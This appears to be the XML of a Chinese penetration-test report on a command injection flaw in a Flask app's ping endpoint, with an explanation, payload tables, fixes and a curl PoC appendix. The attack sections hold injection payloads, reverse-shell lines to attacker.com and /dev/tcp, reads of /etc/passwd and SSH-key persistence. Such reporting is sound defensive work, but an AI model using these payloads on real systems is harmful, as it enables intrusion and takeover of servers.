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命令执行/命令注入漏洞检测报告</w:t>
        <w:br/>
        <w:t>Command Injection Vulnerability Report</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>检测日期：2026年07月16日</w:t>
        <w:br/>
        <w:t>漏洞类型：OS命令注入 / RCE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一、什么是命令注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>二、本次检测范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>三、漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>五、攻击演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>六、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>七、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>八、安全建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、什么是命令注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入（Command Injection）是Web安全漏洞，攻击者在服务器上执行任意系统命令，可直接导致服务器被完全控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>原理：用户输入拼接系统命令 + shell=True + 无过滤 = 任意命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>利用字符：; 分隔 | 管道 || 或 &amp;&amp; 与 ` 反引号 $( ) 命令替换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、本次检测范围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漏洞入口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>subprocess.check_output(cmd, shell=True)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🔴 致命 - 任意命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>已验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>whoami→root, ls→列出目录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ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cmd = f"ping -c 3 {ip}"               # f-string直接拼接</w:t>
        <w:br/>
        <w:t>result = subprocess.check_output(cmd, shell=True)  # shell=True启用Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、漏洞代码定位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漏洞点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4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f"ping -c 3 {ip}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户输入直接拼入命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>启用Shell解析，支持;|`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ip = request.form.get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无任何过滤校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>result.decode()返回用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>攻击者可看到结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>timeout=30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>仅限制单次执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>触发链：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip = "8.8.8.8; whoami"</w:t>
        <w:br/>
        <w:t>→ cmd = f"ping -c 3 8.8.8.8; whoami"</w:t>
        <w:br/>
        <w:t>→ Shell执行: ping -c 3 8.8.8.8 → whoami</w:t>
        <w:br/>
        <w:t>→ 返回 "root"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入特殊字符：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;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令分隔符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>|</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>| ls -la</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>||</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>或运算</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>|| whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>&amp;&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>与运算</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>&amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>`whoami`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>攻击目标分类：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命令示例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t>信息收集</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>whoami;id;uname -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取系统信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>cat /etc/passwd; ls -la</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取敏感文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反弹Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bash -i &gt;&amp; /dev/tcp/x/4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获得交互式Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>useradd hack; echo密钥&gt;&gt;authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>创建后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、攻击演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击1：基本信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip=127.0.0.1; whoami                 → root（最高权限）</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; uname -a              → Linux内核版本</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; ifconfig              → 192.168.41.129</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; cat /etc/passwd       → 系统用户列表</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; ps aux                → 所有运行进程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击2：读取应用源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip=127.0.0.1; cat /workspace/user-management-platform/app.py</w:t>
        <w:br/>
        <w:t>→ 获取完整Flask源码 → SECRET_KEY、数据库路径、全部路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击3：反弹Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 攻击者监听: nc -lvnp 4444</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; python3 -c 'import socket,subprocess;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  s=socket.socket();s.connect(("attacker.com",4444));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'</w:t>
        <w:br/>
        <w:t>→ 攻击者获得完整交互式Shell！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击4：持久化控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip=127.0.0.1; echo "ssh-rsa AAA..." &gt;&gt; /root/.ssh/authorized_keys</w:t>
        <w:br/>
        <w:t>→ SSH密钥持久化，攻击者随时可登录服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>完整攻击链：从发现漏洞到完全控制服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段1：发现漏洞 → ip=127.0.0.1; echo INJECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段2：信息收集 → id(uname/cat/ps) 获系统全貌</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段3：获取Shell → 反弹Shell获得交互式控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段4：持久化 → SSH密钥/后门账户/crontab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段5：横向移动 → 扫描内网/窃取数据/攻击其他服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>→ 服务器完全沦陷！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>最简修复（移除 shell=True）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 修复前（有漏洞）</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t>result = subprocess.check_output(cmd, shell=True)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 修复后（安全）</w:t>
        <w:br/>
        <w:t>result = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ["ping", "-c", "3", ip],  # 参数列表</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout=30</w:t>
        <w:br/>
        <w:t>)  # shell=False（默认）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>白名单输入校验：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import re</w:t>
        <w:br/>
        <w:t>ip_pattern = r"^(\d{1,3}\.){3}\d{1,3}$"</w:t>
        <w:br/>
        <w:t>domain_pattern = r"^[a-zA-Z0-9]([a-zA-Z0-9\-]+\.)+[a-zA-Z]{2,}$"</w:t>
        <w:br/>
        <w:t>if not (re.match(ip_pattern, ip) or re.match(domain_pattern, ip)):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "无效地址"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复前后对比：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防护项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命令构建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f-string拼接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>参数列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>输入校验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IP/域名白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>错误处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>返回原始错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>统一信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、安全建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 永远不要使用 shell=True，用参数列表替代字符串拼接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 所有用户输入必须白名单校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. Web应用不以root运行（最小权限原则）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 使用 Docker 隔离应用运行环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 部署 RASP/HIDS 检测命令注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 命令执行操作全量日志审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复优先级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难度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>P0立即</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>移除shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻止所有注入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P0立即</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP白名单正则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>防止注入字符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P1紧急</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>不以root运行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>限制影响范围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r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 1: 基础命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 登录</w:t>
        <w:br/>
        <w:t>curl -c cookies.txt http://target/login &gt; /dev/null 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t>CSRF=$(curl -b cookies.txt http://target/login 2&gt;&amp;1 | grep -oP 'value="[a-f0-9]{32}"' | head -1 | grep -oP '[a-f0-9]{32}')</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -c cookies.txt http://target/login -d "username=admin&amp;password=admin123&amp;csrf_token=${CSRF}"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 执行命令</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -X POST -d "ip=127.0.0.1; whoami" http://target/ping</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -X POST -d "ip=127.0.0.1; cat /etc/passwd" http://target/ping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 2: 自动化探测脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cmd() { curl -b cookies.txt -s -X POST -d "ip=127.0.0.1; $1" http://target/ping | grep -oP 'ping-output"&gt;\K[^&lt;]+'; }</w:t>
        <w:br/>
        <w:t>cmd "id"</w:t>
        <w:br/>
        <w:t>cmd "whoami"</w:t>
        <w:br/>
        <w:t>cmd "ifconfig"</w:t>
        <w:br/>
        <w:t>cmd "cat /etc/passwd | head -5"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